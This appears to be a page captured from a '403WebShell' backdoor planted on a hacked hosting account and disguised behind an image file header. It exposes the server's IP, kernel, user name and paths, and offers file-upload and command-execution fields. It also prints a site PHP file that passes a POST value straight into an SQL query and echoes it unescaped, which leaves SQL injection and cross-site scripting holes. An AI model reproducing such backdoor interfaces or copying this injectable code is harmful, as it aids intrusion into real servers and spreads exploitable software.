����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 162.0.232.25  /  Your IP : 18.226.163.23
Web Server : LiteSpeed
System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : kwacuqig ( 988)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/kwacuqig/sportsmycareer.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/kwacuqig/sportsmycareer.com/fetch_competitions.php
<?php
include './head.php';
$sport = $_POST['option'];
?>

<body>
    <main>
        <!--Players-->
        <section data-background="#ffffff">
            <div class="container">
                <div class="row d-flex justify-content-center">
                    <?php
                    $query = "SELECT * FROM `competitions` WHERE `sport`='$sport' ORDER BY `competition` ASC ";
                    $run = mysqli_query($conn, $query) or die(mysqli_error($conn));
                    if (mysqli_num_rows($run) > 0) {
                        while ($row = mysqli_fetch_array($run)) {
                            $competition = strtolower(str_replace(' ', '-', $row['competition']));
                            ?>
                            <div class="col-lg-3 col-md-4 col-sm-6 col-6 wow fade" data-tilt>
                                <div class="competition">
                                    <a href="fixtures?competition=<?php echo $competition; ?>">
                                        <img src="./competitions/<?php echo $row['image']; ?>" alt="">
                                        <h5><?php echo $row['competition']; ?></h5>
                                        <div class="sport"><?php echo $row['sport']; ?></div>
                                    </a>
                                </div>
                            </div>
                        <?php
                        }
                    } else {
                        ?>
                        <div class="col-12">
                            <p class="sport-unavailable">No <?php echo $sport; ?> Competitions Available</p>
                        </div>
                    <?php
                    }
                    ?>
                </div>
            </div>
        </section>
        <div class="bosluk3"></div>
    </main>

Youez - 2016 - github.com/yon3zu
LinuXploit